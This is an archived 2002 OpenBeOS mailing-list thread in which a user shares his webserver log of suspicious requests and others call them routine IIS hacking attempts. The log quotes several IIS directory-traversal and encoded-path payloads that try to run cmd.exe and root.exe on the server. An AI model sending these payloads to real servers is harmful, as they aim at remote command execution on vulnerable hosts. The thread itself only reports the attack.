[openbeos] Re: I think someone tried to hack into my machine
- From: "Matt Verran" <matt@xxxxxxxxxxxxxxxxxxx>
- To: openbeos@xxxxxxxxxxxxx
- Date: Fri, 22 Mar 2002 02:50:45 GMT
Looks like like Back Orifice,,,,,
Of course BeOS isn't vulnerable to that kind of cow poo!
> I run a personal web-server using RobinHood (Road-Runner Cable
> Modem), I get
> this all the time!!!
>
> They are very standard methods of hacking IIS.
>
> Gary Thom
>
> -----Original Message-----
> From: Daniel Reinhold [mailto:danielr@xxxxxxxxxxxxx]
> Sent: 19 March, 2002 2:49 AM
> To: Public OBOS mailing list
> Subject: [openbeos] I think someone tried to hack into my machine
>
> Ok, this was rather interesting. It happened just about fifteen
> minutes
> ago (as I'm writing this).
>
> I'm online (PPP dialup) and am also running a local webserver (i.e.
> sending requests to loopback address 127.0.0.1). Yeah, that's asking
> for trouble, at least theoretically. That is, someone on the
> internet,
> if they happened to get a hold of my (temporary, dynamically
> assigned)
> IP, could send requests for local files and have them sent back out
> across the network. I've never had anything weird happen before, so
> I've always been pretty blase about the security risk.
>
> Anyway, I'm just testing some news items locally before copying them
> over to the OpenBeOS website (which is my usual MO). Suddenly, I
> notice
> the Terminal window (largely covered by another window, but partially
> showing) has a flurry of text flying by and the DUN replicant in the
> Deskbar shows lots of bytes transmitting back and forth. Wtf? So I
> uncover the Terminal window (which is running the webserver) and see
> that a number of unusual requests have just been attended to. Here's
> the first one:
>
> GET /scripts/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
>
> The remaining requests all look like that but with different URLs.
> Here
> are the other URLs that were requested:
>
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c
> +
> dir HTTP/1.0
> GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c
> +
> dir HTTP/1.0
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../
> ..%c1%1c..
> /winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
>
> To me, that looks all the world like some hacker trying to grab files
> from my local machine. Could there be another explanation?
>
> Of course, I'm running BeOS (and don't have NT) so my local webserver
> just returned a bunch of 404 (Not found) responses. Still, makes you
> wonder.
>
> Has anyone else on this list had any similar experiences? What do you
> make of this?
>
Other related posts:
